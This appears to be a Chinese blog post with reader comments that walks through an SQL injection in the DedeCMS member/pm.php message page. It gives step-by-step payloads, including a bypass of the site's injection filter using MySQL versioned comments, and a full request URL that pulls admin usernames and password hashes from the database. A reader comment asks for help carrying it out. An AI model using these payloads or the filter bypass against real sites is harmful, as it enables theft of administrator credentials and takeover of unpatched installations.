DEDECMS会员中心注入2

 

漏洞文件member/pm.php (官方已修补)

下载补丁下来看看member/pm.php文件到底修补了什么

 

id

 

对id加了个intval

看来id是有注入的j节奏了
fuck

关键在这里

先构造语句  DEDE不是有80sec防注入嘛  所以加个char(@`’`)
SELECT * FROM `#@__member_pms` WHERE id=’1’and char(@`’`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #’ AND (fromid=’6′ OR toid=’6’)

然后提交
http://127.0.0.1/dede/member/pm. … =2+UniOn+SelEct%201,2,3,4,5,6,7,8,9,10,11,12%20%23

 

safe

 

Safe Alert: Request Error step 1 !

 

 

safe1

过滤union神马的  绕过无压力直接/*!50000Union*/ 就可以过了

然后提交

http://127.0.0.1/dede/member/pm.php?dopost=read&id=1’and char(@`’`) and 1=2+/*!50000Union*/ +/*!50000select*/ +1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

 

 

sql

 

成功注入

 

 

 

 

文 / admin
3 COMMENTS
  1. 2014/02/14
    bobo

    对不起,你指定的消息不存在或你没权限查看!
    如果你的浏览器没反应,请点击这里…

    怎么回事?

    • admin
      2014/02/15
      admin
      @bobo
  2. 2014/02/23
    bobo

    大牛请问这一步怎么操作…别喷
    先构造语句 DEDE不是有80sec防注入嘛 所以加个char(@`’`)
    SELECT * FROM `#@__member_pms` WHERE id=’1’and char(@`’`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #’ AND (fromid=’6′ OR toid=’6’)

LEAVE A REPLY

loading